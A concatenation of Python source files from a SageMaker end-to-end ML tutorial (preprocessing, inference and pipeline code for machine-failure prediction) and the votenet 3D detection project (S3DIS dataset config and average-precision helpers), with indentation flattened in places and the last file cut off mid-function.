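#     req = BaseRequest(env)
#     req.method -> 'GET'; req.port -> 8080; req.path -> ['api', 'items']
#     req.query_string -> {'id': '42'}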
|
Niobiumkey/amazon-sagemaker-build-train-deploy | 02_data_exploration_and_feature_eng/source_dir/preprocessor.py | import argparse
import os
import warnings
import subprocess
subprocess.call(['pip', 'install', 'sagemaker-experiments'])
import pandas as pd
import numpy as np
import tarfile
from smexperiments.tracker import Tracker
from sklearn.externals import joblib
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import StandardScaler, OneHotEncoder
from sklearn.compose import ColumnTransformer
from sklearn.exceptions import DataConversionWarning
warnings.filterwarnings(action='ignore', category=DataConversionWarning)
columns = ['Type', 'Air temperature [K]', 'Process temperature [K]', 'Rotational speed [rpm]', 'Torque [Nm]', 'Tool wear [min]', 'Machine failure']
cat_columns = ['Type']
num_columns = ['Air temperature [K]', 'Process temperature [K]', 'Rotational speed [rpm]', 'Torque [Nm]', 'Tool wear [min]']
target_column = 'Machine failure'
if __name__=='__main__':
# Read the arguments passed to the script.
parser = argparse.ArgumentParser()
parser.add_argument('--train-test-split-ratio', type=float, default=0.3)
args, _ = parser.parse_known_args()
# Tracking specific parameter value during job.
tracker = Tracker.load()
tracker.log_parameter('train-test-split-ratio', args.train_test_split_ratio)
print('Received arguments {}'.format(args))
# Read input data into a Pandas dataframe.
input_data_path = os.path.join('/opt/ml/processing/input', 'predmain_raw_data_header.csv')
print('Reading input data from {}'.format(input_data_path))
df = pd.read_csv(input_data_path, usecols=columns)
X = df.drop(target_column, axis=1)
y = df[target_column]
# Splitting.
split_ratio = args.train_test_split_ratio
print('Splitting data into train and validation sets with ratio {}'.format(split_ratio))
X_train, X_val, y_train, y_val = train_test_split(X, y, test_size=split_ratio,
random_state=0,
stratify=y)
transformer = ColumnTransformer(transformers=[('numeric', StandardScaler(), num_columns),
('categorical', OneHotEncoder(), cat_columns)],
remainder='passthrough')
featurizer_model = transformer.fit(X_train)
X_train = featurizer_model.transform(X_train)
X_val = featurizer_model.transform(X_val)
print('Train features shape after preprocessing: {}'.format(X_train.shape))
print('Train labels shape after preprocessing: {}'.format(y_train.shape))
print('Validation features shape after preprocessing: {}'.format(X_val.shape))
print('Validation labels shape after preprocessing: {}'.format(y_val.shape))
# Saving outputs.
train_features_output_path = os.path.join('/opt/ml/processing/train', 'train_features.csv')
train_labels_output_path = os.path.join('/opt/ml/processing/train', 'train_labels.csv')
val_features_output_path = os.path.join('/opt/ml/processing/val', 'val_features.csv')
val_labels_output_path = os.path.join('/opt/ml/processing/val', 'val_labels.csv')
print('Saving training features to {}'.format(train_features_output_path))
pd.DataFrame(X_train).to_csv(train_features_output_path, header=False, index=False)
print('Saving validation features to {}'.format(val_features_output_path))
pd.DataFrame(X_val).to_csv(val_features_output_path, header=False, index=False)
print('Saving training labels to {}'.format(train_labels_output_path))
pd.DataFrame(y_train).to_csv(train_labels_output_path, header=False, index=False)
print('Saving validation labels to {}'.format(val_labels_output_path))
pd.DataFrame(y_val).to_csv(val_labels_output_path, header=False, index=False)
# Saving model.
model_path = os.path.join('/opt/ml/processing/model', 'model.joblib')
model_output_path = os.path.join('/opt/ml/processing/model', 'model.tar.gz')
print('Saving featurizer model to {}'.format(model_output_path))
joblib.dump(featurizer_model, model_path)
tar = tarfile.open(model_output_path, "w:gz")
tar.add(model_path, arcname="model.joblib")
tar.close()
tracker.close()
|
Niobiumkey/amazon-sagemaker-build-train-deploy | 04_deploy_model/sklearn_source_dir/inference.py | from __future__ import print_function
import sys
from io import StringIO
import os
import csv
import json
import numpy as np
import pandas as pd
from sklearn.externals import joblib
from sagemaker_containers.beta.framework import (
content_types, encoders, env, modules, transformer, worker)
feature_columns_names = ['Type', 'Air temperature [K]', 'Process temperature [K]', 'Rotational speed [rpm]', 'Torque [Nm]', 'Tool wear [min]']
def input_fn(input_data, content_type):
print(input_data)
if content_type == 'text/csv':
df = pd.read_csv(StringIO(input_data), header=None)
if len(df.columns) == len(feature_columns_names):
df.columns = feature_columns_names
return df
else:
raise ValueError("{} not supported by script!".format(content_type))
def predict_fn(input_data, model):
features = model.transform(input_data)
return features
def output_fn(prediction, accept):
if accept == "application/json":
instances = []
for row in prediction.tolist():
instances.append({"features": row})
json_output = {"instances": instances}
return worker.Response(json.dumps(json_output), mimetype=accept)
elif accept == 'text/csv':
return worker.Response(encoders.encode(prediction, accept), mimetype=accept)
else:
        raise RuntimeError("{} accept type is not supported.".format(accept))
def model_fn(model_dir):
preprocessor = joblib.load(os.path.join(model_dir, "model.joblib"))
return preprocessor
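# Illustrative request flow (hypothetical CSV record; not part of the original script):
#     model = model_fn('/opt/ml/model')
#     df = input_fn('M,298.1,308.6,1551,42.8,0', 'text/csv')  # one unlabeled row
#     features = predict_fn(df, model)                        # scaled + one-hot encoded
#     output_fn(features, 'application/json')                 # -> {"instances": [...]}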
|
Niobiumkey/amazon-sagemaker-build-train-deploy | 08_projects/modelbuild/pipelines/endtoendmlsm/workflow.py | import os
import time
import boto3
import sagemaker
from sagemaker.processing import ProcessingInput, ProcessingOutput
from sagemaker.sklearn.processing import SKLearnProcessor
from sagemaker.sklearn import SKLearnModel
from sagemaker.inputs import TrainingInput
from sagemaker.xgboost import XGBoost
from sagemaker.xgboost import XGBoostModel
from sagemaker.pipeline import PipelineModel
from sagemaker.workflow.parameters import (
ParameterInteger,
ParameterString,
)
from sagemaker.workflow.steps import (
ProcessingStep,
TrainingStep
)
from sagemaker.workflow.step_collections import RegisterModel
from sagemaker.workflow.pipeline import Pipeline
BASE_DIR = os.path.dirname(os.path.realpath(__file__))
def get_sagemaker_client(region):
boto_session = boto3.Session(region_name=region)
sagemaker_client = boto_session.client("sagemaker")
return sagemaker_client
def get_pipeline_custom_tags(new_tags, region, sagemaker_project_arn=None):
try:
sm_client = get_sagemaker_client(region)
response = sm_client.list_tags(
ResourceArn=sagemaker_project_arn)
project_tags = response["Tags"]
for project_tag in project_tags:
new_tags.append(project_tag)
except Exception as e:
print(f"Error getting project tags: {e}")
return new_tags
def get_session(region, default_bucket):
boto_session = boto3.Session(region_name=region)
sagemaker_client = boto_session.client("sagemaker")
runtime_client = boto_session.client("sagemaker-runtime")
return sagemaker.session.Session(
boto_session=boto_session,
sagemaker_client=sagemaker_client,
sagemaker_runtime_client=runtime_client,
default_bucket=default_bucket,
)
def get_pipeline(region,
sagemaker_project_arn=None,
role=None,
default_bucket='',
pipeline_name='end-to-end-ml-sagemaker-pipeline',
model_package_group_name='end-to-end-ml-sm-model-package-group',
base_job_prefix='endtoendmlsm') -> Pipeline:
"""
Gets the SM Pipeline.
:param role: The execution role.
:param bucket_name: The bucket where pipeline artifacts are stored.
:param prefix: The prefix where pipeline artifacts are stored.
:return: A Pipeline instance.
"""
bucket_name = default_bucket
prefix = 'endtoendmlsm'
sagemaker_session = get_session(region, bucket_name)
# ---------------------
# Processing parameters
# ---------------------
# The path to the raw data.
    raw_data_path = 's3://gianpo-public/endtoendml/data/raw/predmain_raw_data_header.csv'
raw_data_path_param = ParameterString(name="raw_data_path", default_value=raw_data_path)
# The output path to the training data.
train_data_path = 's3://{0}/{1}/data/preprocessed/train/'.format(bucket_name, prefix)
train_data_path_param = ParameterString(name="train_data_path", default_value=train_data_path)
# The output path to the validation data.
val_data_path = 's3://{0}/{1}/data/preprocessed/val/'.format(bucket_name, prefix)
val_data_path_param = ParameterString(name="val_data_path", default_value=val_data_path)
# The output path to the featurizer model.
model_path = 's3://{0}/{1}/output/sklearn/'.format(bucket_name, prefix)
model_path_param = ParameterString(name="model_path", default_value=model_path)
# The instance type for the processing job.
processing_instance_type_param = ParameterString(name="processing_instance_type", default_value='ml.m5.large')
# The instance count for the processing job.
processing_instance_count_param = ParameterInteger(name="processing_instance_count", default_value=1)
    # The train/test split ratio parameter.
train_test_split_ratio_param = ParameterString(name="train_test_split_ratio", default_value='0.2')
# -------------------
# Training parameters
# -------------------
# XGB hyperparameters.
max_depth_param = ParameterString(name="max_depth", default_value='3')
eta_param = ParameterString(name="eta", default_value='0.1')
gamma_param = ParameterString(name="gamma", default_value='0')
min_child_weight_param = ParameterString(name="min_child_weight", default_value='1')
objective_param = ParameterString(name="objective", default_value='binary:logistic')
num_round_param = ParameterString(name="num_round", default_value='10')
eval_metric_param = ParameterString(name="eval_metric", default_value='auc')
# The instance type for the training job.
training_instance_type_param = ParameterString(name="training_instance_type", default_value='ml.m5.xlarge')
# The instance count for the training job.
training_instance_count_param = ParameterInteger(name="training_instance_count", default_value=1)
# The training output path for the model.
output_path = 's3://{0}/{1}/output/'.format(bucket_name, prefix)
output_path_param = ParameterString(name="output_path", default_value=output_path)
# --------------------------
# Register model parameters
# --------------------------
# The default instance type for deployment.
deploy_instance_type_param = ParameterString(name="deploy_instance_type", default_value='ml.m5.2xlarge')
# The approval status for models added to the registry.
model_approval_status_param = ParameterString(name="model_approval_status", default_value='PendingManualApproval')
# --------------------------
# Processing Step
# --------------------------
sklearn_processor = SKLearnProcessor(role=role,
instance_type=processing_instance_type_param,
instance_count=processing_instance_count_param,
framework_version='0.20.0')
inputs = [ProcessingInput(input_name='raw_data',
source=raw_data_path_param, destination='/opt/ml/processing/input')]
outputs = [ProcessingOutput(output_name='train_data',
source='/opt/ml/processing/train', destination=train_data_path_param),
ProcessingOutput(output_name='val_data',
source='/opt/ml/processing/val', destination=val_data_path_param),
ProcessingOutput(output_name='model',
source='/opt/ml/processing/model', destination=model_path_param)]
code_path = os.path.join(BASE_DIR, 'dataprep/preprocess.py')
processing_step = ProcessingStep(
name='Processing',
code=code_path,
processor=sklearn_processor,
inputs=inputs,
outputs=outputs,
job_arguments=['--train-test-split-ratio', train_test_split_ratio_param]
)
# --------------------------
# Training Step
# --------------------------
hyperparameters = {
"max_depth": max_depth_param,
"eta": eta_param,
"gamma": gamma_param,
"min_child_weight": min_child_weight_param,
"silent": 0,
"objective": objective_param,
"num_round": num_round_param,
"eval_metric": eval_metric_param
}
entry_point = 'train.py'
source_dir = os.path.join(BASE_DIR, 'train/')
code_location = 's3://{0}/{1}/code'.format(bucket_name, prefix)
estimator = XGBoost(
entry_point=entry_point,
source_dir=source_dir,
output_path=output_path_param,
code_location=code_location,
hyperparameters=hyperparameters,
instance_type=training_instance_type_param,
instance_count=training_instance_count_param,
framework_version="0.90-2",
py_version="py3",
role=role
)
training_step = TrainingStep(
name='Training',
estimator=estimator,
inputs={
'train': TrainingInput(
s3_data=processing_step.properties.ProcessingOutputConfig.Outputs[
'train_data'
].S3Output.S3Uri,
content_type='text/csv'
),
'validation': TrainingInput(
s3_data=processing_step.properties.ProcessingOutputConfig.Outputs[
'val_data'
].S3Output.S3Uri,
content_type='text/csv'
)
}
)
# --------------------------
# Register Model Step
# --------------------------
code_location = 's3://{0}/{1}/code'.format(bucket_name, prefix)
sklearn_model = SKLearnModel(name='end-to-end-ml-sm-skl-model-{0}'.format(str(int(time.time()))),
model_data=processing_step.properties.ProcessingOutputConfig.Outputs[
'model'].S3Output.S3Uri,
entry_point='inference.py',
source_dir=os.path.join(BASE_DIR, 'deploy/sklearn/'),
code_location=code_location,
role=role,
sagemaker_session=sagemaker_session,
framework_version='0.20.0',
py_version='py3')
code_location = 's3://{0}/{1}/code'.format(bucket_name, prefix)
xgboost_model = XGBoostModel(name='end-to-end-ml-sm-xgb-model-{0}'.format(str(int(time.time()))),
model_data=training_step.properties.ModelArtifacts.S3ModelArtifacts,
entry_point='inference.py',
source_dir=os.path.join(BASE_DIR, 'deploy/xgboost/'),
code_location=code_location,
framework_version='0.90-2',
py_version='py3',
role=role,
sagemaker_session=sagemaker_session)
pipeline_model_name = 'end-to-end-ml-sm-xgb-skl-pipeline-{0}'.format(str(int(time.time())))
pipeline_model = PipelineModel(
name=pipeline_model_name,
role=role,
models=[
sklearn_model,
xgboost_model],
sagemaker_session=sagemaker_session)
register_model_step = RegisterModel(
name='RegisterModel',
content_types=['text/csv'],
response_types=['application/json', 'text/csv'],
inference_instances=[deploy_instance_type_param, 'ml.m5.large'],
transform_instances=['ml.c5.4xlarge'],
model_package_group_name=model_package_group_name,
approval_status=model_approval_status_param,
model=pipeline_model
)
# --------------------------
# Pipeline
# --------------------------
pipeline = Pipeline(
name=pipeline_name,
parameters=[
raw_data_path_param,
train_data_path_param,
val_data_path_param,
model_path_param,
processing_instance_type_param,
processing_instance_count_param,
train_test_split_ratio_param,
max_depth_param,
eta_param,
gamma_param,
min_child_weight_param,
objective_param,
num_round_param,
eval_metric_param,
training_instance_type_param,
training_instance_count_param,
output_path_param,
deploy_instance_type_param,
model_approval_status_param
],
steps=[processing_step, training_step, register_model_step],
sagemaker_session=sagemaker_session,
)
response = pipeline.upsert(role_arn=role)
print(response["PipelineArn"])
return pipeline
def run_pipeline(pipeline: Pipeline, parameters: dict) -> str:
"""
Runs the SM Pipeline.
:param pipeline: The SM Pipeline instance.
:param parameters: The pipeline execution parameters.
:return: The ARN of the registered model package.
"""
execution = pipeline.start(parameters)
execution.wait()
# Let's check the model package has been registered
steps = execution.list_steps()
register_model_step = next(s for s in steps if s['StepName'] == 'RegisterModel')
model_package_arn = register_model_step['Metadata']['RegisterModel']['Arn']
return model_package_arn
if __name__ == "__main__":
execution_role = sagemaker.get_execution_role()
session = sagemaker.Session()
bucket = session.default_bucket()
boto_session = boto3.session.Session()
region = boto_session.region_name
# Build pipeline.
end_to_end_pipeline = get_pipeline(region, None, execution_role, bucket)
# Set parameters.
execution_parameters = {
'train_test_split_ratio': '0.2'
}
# Run pipeline
model_package_version_arn = run_pipeline(end_to_end_pipeline, execution_parameters)
print(model_package_version_arn)
|
zaiweizhang/votenet | s3dis/model_util_s3dis.py | <gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
import numpy as np
import sys
import os
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(BASE_DIR)
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(os.path.join(ROOT_DIR, 'utils'))
from box_util import get_3d_box
class S3disDatasetConfig(object):
def __init__(self):
        self.num_class = 10  # 18 in the original ScanNet config
        self.num_heading_bin = 1
        self.num_size_cluster = 10  # 18 in the original ScanNet config
#self.type2class = {'cabinet':0, 'bed':1, 'chair':2, 'sofa':3, 'table':4, 'door':5,
# 'window':6,'bookshelf':7,'picture':8, 'counter':9, 'desk':10, 'curtain':11,
# 'refrigerator':12, 'showercurtrain':13, 'toilet':14, 'sink':15, 'bathtub':16, 'garbagebin':17}
#self.class2type = {13:'clutter', 4:'beam', 12:'board', 10:'bookcase', 1:'ceiling', 9:'chair', 5:'column', 7:'door', 2:'floor', 11:'sofa', 14:'stairs', 8:'table', 3:'wall', 6:'window'}
        self.class2type = {0:'ceiling', 1:'floor', 2:'wall', 3:'window', 4:'door', 5:'table', 6:'chair', 7:'bookcase', 8:'sofa', 9:'board'}
#self.class2type = {self.type2class[t]:t for t in self.type2class}
self.type2class = {self.class2type[t]:t for t in self.class2type}
self.nyu40ids = np.array([1,2,3,6,7,8,9,10,11,12])
self.nyu40id2class = {nyu40id: i for i,nyu40id in enumerate(list(self.nyu40ids))}
#import pdb;pdb.set_trace()
self.mean_size_arr = np.load(os.path.join(ROOT_DIR,'s3dis/meta_data/s3dis_means.npy'))[self.nyu40ids-1,:]#['arr_0']
self.type_mean_size = {}
for i in range(self.num_size_cluster):
self.type_mean_size[self.class2type[i]] = self.mean_size_arr[i,:]
def angle2class(self, angle):
''' Convert continuous angle to discrete class
        [optional] also returns a small regression number from
class center angle to current angle.
angle is from 0-2pi (or -pi~pi), class center at 0, 1*(2pi/N), 2*(2pi/N) ... (N-1)*(2pi/N)
return is class of int32 of 0,1,...,N-1 and a number such that
class*(2pi/N) + number = angle
NOT USED.
'''
assert(False)
def class2angle(self, pred_cls, residual, to_label_format=True):
''' Inverse function to angle2class.
        ScanNet only has axis-aligned boxes, so angles are always 0. '''
return 0
def size2class(self, size, type_name):
''' Convert 3D box size (l,w,h) to size class and size residual '''
size_class = self.type2class[type_name]
size_residual = size - self.type_mean_size[type_name]
return size_class, size_residual
def class2size(self, pred_cls, residual):
''' Inverse function to size2class '''
return self.mean_size_arr[pred_cls, :] + residual
def param2obb(self, center, heading_class, heading_residual, size_class, size_residual):
heading_angle = self.class2angle(heading_class, heading_residual)
box_size = self.class2size(int(size_class), size_residual)
obb = np.zeros((7,))
obb[0:3] = center
obb[3:6] = box_size
obb[6] = heading_angle*-1
return obb
def rotate_aligned_boxes(input_boxes, rot_mat):
centers, lengths = input_boxes[:,0:3], input_boxes[:,3:6]
new_centers = np.dot(centers, np.transpose(rot_mat))
dx, dy = lengths[:,0]/2.0, lengths[:,1]/2.0
new_x = np.zeros((dx.shape[0], 4))
new_y = np.zeros((dx.shape[0], 4))
for i, crnr in enumerate([(-1,-1), (1, -1), (1, 1), (-1, 1)]):
crnrs = np.zeros((dx.shape[0], 3))
crnrs[:,0] = crnr[0]*dx
crnrs[:,1] = crnr[1]*dy
crnrs = np.dot(crnrs, np.transpose(rot_mat))
new_x[:,i] = crnrs[:,0]
new_y[:,i] = crnrs[:,1]
new_dx = 2.0*np.max(new_x, 1)
new_dy = 2.0*np.max(new_y, 1)
new_lengths = np.stack((new_dx, new_dy, lengths[:,2]), axis=1)
return np.concatenate([new_centers, new_lengths], axis=1)
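# Illustrative sketch (not part of the original module): rotate axis-aligned
# boxes about the z-axis and recompute axis-aligned x/y extents:
#     theta = np.pi / 6
#     rot = np.array([[np.cos(theta), -np.sin(theta), 0],
#                     [np.sin(theta),  np.cos(theta), 0],
#                     [0,             0,              1]])
#     boxes = np.array([[0., 0., 1., 2., 1., 3.]])  # (cx, cy, cz, dx, dy, dz)
#     rotate_aligned_boxes(boxes, rot)  # rotated centers, enlarged x/y sizes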
|
zaiweizhang/votenet | models/ap_helper.py | <filename>models/ap_helper.py<gh_stars>1-10
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
""" Helper functions and class to calculate Average Precisions for 3D object detection.
"""
import os
import sys
import numpy as np
import torch
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
ROOT_DIR = os.path.dirname(BASE_DIR)
sys.path.append(os.path.join(ROOT_DIR, 'utils'))
from eval_det import eval_det_cls, eval_det_multiprocessing
from eval_det import get_iou_obb
from nms import nms_2d_faster, nms_3d_faster, nms_3d_faster_samecls
from box_util import get_3d_box
sys.path.append(os.path.join(ROOT_DIR, 'sunrgbd'))
from sunrgbd_utils import extract_pc_in_box3d
def flip_axis_to_camera(pc):
''' Flip X-right,Y-forward,Z-up to X-right,Y-down,Z-forward
Input and output are both (N,3) array
'''
pc2 = np.copy(pc)
pc2[...,[0,1,2]] = pc2[...,[0,2,1]] # cam X,Y,Z = depth X,-Z,Y
pc2[...,1] *= -1
return pc2
def flip_axis_to_depth(pc):
pc2 = np.copy(pc)
pc2[...,[0,1,2]] = pc2[...,[0,2,1]] # depth X,Y,Z = cam X,Z,-Y
pc2[...,2] *= -1
return pc2
def softmax(x):
''' Numpy function for softmax'''
shape = x.shape
probs = np.exp(x - np.max(x, axis=len(shape)-1, keepdims=True))
probs /= np.sum(probs, axis=len(shape)-1, keepdims=True)
return probs
def parse_predictions(end_points, config_dict):
""" Parse predictions to OBB parameters and suppress overlapping boxes
Args:
end_points: dict
{point_clouds, center, heading_scores, heading_residuals,
size_scores, size_residuals, sem_cls_scores}
config_dict: dict
{dataset_config, remove_empty_box, use_3d_nms, nms_iou,
use_old_type_nms, conf_thresh, per_class_proposal}
Returns:
batch_pred_map_cls: a list of len == batch size (BS)
[pred_list_i], i = 0, 1, ..., BS-1
where pred_list_i = [(pred_sem_cls, box_params, box_score)_j]
where j = 0, ..., num of valid detections - 1 from sample input i
"""
pred_center = end_points['center'] # B,num_proposal,3
pred_heading_class = torch.argmax(end_points['heading_scores'], -1) # B,num_proposal
pred_heading_residual = torch.gather(end_points['heading_residuals'], 2,
pred_heading_class.unsqueeze(-1)) # B,num_proposal,1
pred_heading_residual.squeeze_(2)
pred_size_class = torch.argmax(end_points['size_scores'], -1) # B,num_proposal
pred_size_residual = torch.gather(end_points['size_residuals'], 2,
pred_size_class.unsqueeze(-1).unsqueeze(-1).repeat(1,1,1,3)) # B,num_proposal,1,3
pred_size_residual.squeeze_(2)
pred_sem_cls = torch.argmax(end_points['sem_cls_scores'], -1) # B,num_proposal
sem_cls_probs = softmax(end_points['sem_cls_scores'].detach().cpu().numpy()) # B,num_proposal,10
pred_sem_cls_prob = np.max(sem_cls_probs,-1) # B,num_proposal
num_proposal = pred_center.shape[1]
# Since we operate in upright_depth coord for points, while util functions
# assume upright_camera coord.
bsize = pred_center.shape[0]
pred_corners_3d_upright_camera = np.zeros((bsize, num_proposal, 8, 3))
pred_center_upright_camera = flip_axis_to_camera(pred_center.detach().cpu().numpy())
for i in range(bsize):
for j in range(num_proposal):
heading_angle = config_dict['dataset_config'].class2angle(\
pred_heading_class[i,j].detach().cpu().numpy(), pred_heading_residual[i,j].detach().cpu().numpy())
box_size = config_dict['dataset_config'].class2size(\
int(pred_size_class[i,j].detach().cpu().numpy()), pred_size_residual[i,j].detach().cpu().numpy())
corners_3d_upright_camera = get_3d_box(box_size, heading_angle, pred_center_upright_camera[i,j,:])
pred_corners_3d_upright_camera[i,j] = corners_3d_upright_camera
K = pred_center.shape[1] # K==num_proposal
nonempty_box_mask = np.ones((bsize, K))
if config_dict['remove_empty_box']:
# -------------------------------------
# Remove predicted boxes without any point within them..
batch_pc = end_points['point_clouds'].cpu().numpy()[:,:,0:3] # B,N,3
for i in range(bsize):
pc = batch_pc[i,:,:] # (N,3)
for j in range(K):
box3d = pred_corners_3d_upright_camera[i,j,:,:] # (8,3)
box3d = flip_axis_to_depth(box3d)
pc_in_box,inds = extract_pc_in_box3d(pc, box3d)
if len(pc_in_box) < 5:
nonempty_box_mask[i,j] = 0
# -------------------------------------
obj_logits = end_points['objectness_scores'].detach().cpu().numpy()
obj_prob = softmax(obj_logits)[:,:,1] # (B,K)
if not config_dict['use_3d_nms']:
# ---------- NMS input: pred_with_prob in (B,K,7) -----------
pred_mask = np.zeros((bsize, K))
for i in range(bsize):
boxes_2d_with_prob = np.zeros((K,5))
for j in range(K):
boxes_2d_with_prob[j,0] = np.min(pred_corners_3d_upright_camera[i,j,:,0])
boxes_2d_with_prob[j,2] = np.max(pred_corners_3d_upright_camera[i,j,:,0])
boxes_2d_with_prob[j,1] = np.min(pred_corners_3d_upright_camera[i,j,:,2])
boxes_2d_with_prob[j,3] = np.max(pred_corners_3d_upright_camera[i,j,:,2])
boxes_2d_with_prob[j,4] = obj_prob[i,j]
nonempty_box_inds = np.where(nonempty_box_mask[i,:]==1)[0]
pick = nms_2d_faster(boxes_2d_with_prob[nonempty_box_mask[i,:]==1,:],
config_dict['nms_iou'], config_dict['use_old_type_nms'])
assert(len(pick)>0)
pred_mask[i, nonempty_box_inds[pick]] = 1
end_points['pred_mask'] = pred_mask
# ---------- NMS output: pred_mask in (B,K) -----------
elif config_dict['use_3d_nms'] and (not config_dict['cls_nms']):
# ---------- NMS input: pred_with_prob in (B,K,7) -----------
pred_mask = np.zeros((bsize, K))
for i in range(bsize):
boxes_3d_with_prob = np.zeros((K,7))
for j in range(K):
boxes_3d_with_prob[j,0] = np.min(pred_corners_3d_upright_camera[i,j,:,0])
boxes_3d_with_prob[j,1] = np.min(pred_corners_3d_upright_camera[i,j,:,1])
boxes_3d_with_prob[j,2] = np.min(pred_corners_3d_upright_camera[i,j,:,2])
boxes_3d_with_prob[j,3] = np.max(pred_corners_3d_upright_camera[i,j,:,0])
boxes_3d_with_prob[j,4] = np.max(pred_corners_3d_upright_camera[i,j,:,1])
boxes_3d_with_prob[j,5] = np.max(pred_corners_3d_upright_camera[i,j,:,2])
boxes_3d_with_prob[j,6] = obj_prob[i,j]
nonempty_box_inds = np.where(nonempty_box_mask[i,:]==1)[0]
pick = nms_3d_faster(boxes_3d_with_prob[nonempty_box_mask[i,:]==1,:],
config_dict['nms_iou'], config_dict['use_old_type_nms'])
assert(len(pick)>0)
pred_mask[i, nonempty_box_inds[pick]] = 1
end_points['pred_mask'] = pred_mask
# ---------- NMS output: pred_mask in (B,K) -----------
elif config_dict['use_3d_nms'] and config_dict['cls_nms']:
# ---------- NMS input: pred_with_prob in (B,K,8) -----------
pred_mask = np.zeros((bsize, K))
for i in range(bsize):
boxes_3d_with_prob = np.zeros((K,8))
for j in range(K):
boxes_3d_with_prob[j,0] = np.min(pred_corners_3d_upright_camera[i,j,:,0])
boxes_3d_with_prob[j,1] = np.min(pred_corners_3d_upright_camera[i,j,:,1])
boxes_3d_with_prob[j,2] = np.min(pred_corners_3d_upright_camera[i,j,:,2])
boxes_3d_with_prob[j,3] = np.max(pred_corners_3d_upright_camera[i,j,:,0])
boxes_3d_with_prob[j,4] = np.max(pred_corners_3d_upright_camera[i,j,:,1])
boxes_3d_with_prob[j,5] = np.max(pred_corners_3d_upright_camera[i,j,:,2])
boxes_3d_with_prob[j,6] = obj_prob[i,j]
boxes_3d_with_prob[j,7] = pred_sem_cls[i,j] # only suppress if the two boxes are of the same class!!
nonempty_box_inds = np.where(nonempty_box_mask[i,:]==1)[0]
pick = nms_3d_faster_samecls(boxes_3d_with_prob[nonempty_box_mask[i,:]==1,:],
config_dict['nms_iou'], config_dict['use_old_type_nms'])
assert(len(pick)>0)
pred_mask[i, nonempty_box_inds[pick]] = 1
end_points['pred_mask'] = pred_mask
# ---------- NMS output: pred_mask in (B,K) -----------
batch_pred_map_cls = [] # a list (len: batch_size) of list (len: num of predictions per sample) of tuples of pred_cls, pred_box and conf (0-1)
for i in range(bsize):
if config_dict['per_class_proposal']:
cur_list = []
for ii in range(config_dict['dataset_config'].num_class):
cur_list += [(ii, pred_corners_3d_upright_camera[i,j], sem_cls_probs[i,j,ii]*obj_prob[i,j]) \
for j in range(pred_center.shape[1]) if pred_mask[i,j]==1 and obj_prob[i,j]>config_dict['conf_thresh']]
batch_pred_map_cls.append(cur_list)
else:
batch_pred_map_cls.append([(pred_sem_cls[i,j].item(), pred_corners_3d_upright_camera[i,j], obj_prob[i,j]) \
for j in range(pred_center.shape[1]) if pred_mask[i,j]==1 and obj_prob[i,j]>config_dict['conf_thresh']])
end_points['batch_pred_map_cls'] = batch_pred_map_cls
return batch_pred_map_cls
def parse_groundtruths(end_points, config_dict):
""" Parse groundtruth labels to OBB parameters.
Args:
end_points: dict
{center_label, heading_class_label, heading_residual_label,
size_class_label, size_residual_label, sem_cls_label,
box_label_mask}
config_dict: dict
{dataset_config}
Returns:
batch_gt_map_cls: a list of len == batch_size (BS)
[gt_list_i], i = 0, 1, ..., BS-1
where gt_list_i = [(gt_sem_cls, gt_box_params)_j]
where j = 0, ..., num of objects - 1 at sample input i
"""
center_label = end_points['center_label']
heading_class_label = end_points['heading_class_label']
heading_residual_label = end_points['heading_residual_label']
size_class_label = end_points['size_class_label']
size_residual_label = end_points['size_residual_label']
box_label_mask = end_points['box_label_mask']
sem_cls_label = end_points['sem_cls_label']
bsize = center_label.shape[0]
K2 = center_label.shape[1] # K2==MAX_NUM_OBJ
gt_corners_3d_upright_camera = np.zeros((bsize, K2, 8, 3))
gt_center_upright_camera = flip_axis_to_camera(center_label[:,:,0:3].detach().cpu().numpy())
for i in range(bsize):
for j in range(K2):
if box_label_mask[i,j] == 0: continue
heading_angle = config_dict['dataset_config'].class2angle(heading_class_label[i,j].detach().cpu().numpy(), heading_residual_label[i,j].detach().cpu().numpy())
box_size = config_dict['dataset_config'].class2size(int(size_class_label[i,j].detach().cpu().numpy()), size_residual_label[i,j].detach().cpu().numpy())
corners_3d_upright_camera = get_3d_box(box_size, heading_angle, gt_center_upright_camera[i,j,:])
gt_corners_3d_upright_camera[i,j] = corners_3d_upright_camera
batch_gt_map_cls = []
for i in range(bsize):
batch_gt_map_cls.append([(sem_cls_label[i,j].item(), gt_corners_3d_upright_camera[i,j]) for j in range(gt_corners_3d_upright_camera.shape[1]) if box_label_mask[i,j]==1])
end_points['batch_gt_map_cls'] = batch_gt_map_cls
return batch_gt_map_cls
class APCalculator(object):
''' Calculating Average Precision '''
def __init__(self, ap_iou_thresh=0.25, class2type_map=None):
"""
Args:
ap_iou_thresh: float between 0 and 1.0
IoU threshold to judge whether a prediction is positive.
class2type_map: [optional] dict {class_int:class_name}
"""
self.ap_iou_thresh = ap_iou_thresh
self.class2type_map = class2type_map
self.reset()
def step(self, batch_pred_map_cls, batch_gt_map_cls):
""" Accumulate one batch of prediction and groundtruth.
Args:
batch_pred_map_cls: a list of lists [[(pred_cls, pred_box_params, score),...],...]
batch_gt_map_cls: a list of lists [[(gt_cls, gt_box_params),...],...]
should have the same length with batch_pred_map_cls (batch_size)
"""
bsize = len(batch_pred_map_cls)
assert(bsize == len(batch_gt_map_cls))
for i in range(bsize):
self.gt_map_cls[self.scan_cnt] = batch_gt_map_cls[i]
self.pred_map_cls[self.scan_cnt] = batch_pred_map_cls[i]
self.scan_cnt += 1
def compute_metrics(self):
""" Use accumulated predictions and groundtruths to compute Average Precision.
"""
rec, prec, ap = eval_det_multiprocessing(self.pred_map_cls, self.gt_map_cls, ovthresh=self.ap_iou_thresh, get_iou_func=get_iou_obb)
ret_dict = {}
for key in sorted(ap.keys()):
clsname = self.class2type_map[key] if self.class2type_map else str(key)
ret_dict['%s Average Precision'%(clsname)] = ap[key]
temp = []
for v in list(ap.values()):
if np.isnan(v):
continue
temp.append(v)
ret_dict['mAP'] = np.mean(temp)
rec_list = []
for key in sorted(ap.keys()):
clsname = self.class2type_map[key] if self.class2type_map else str(key)
try:
ret_dict['%s Recall'%(clsname)] = rec[key][-1]
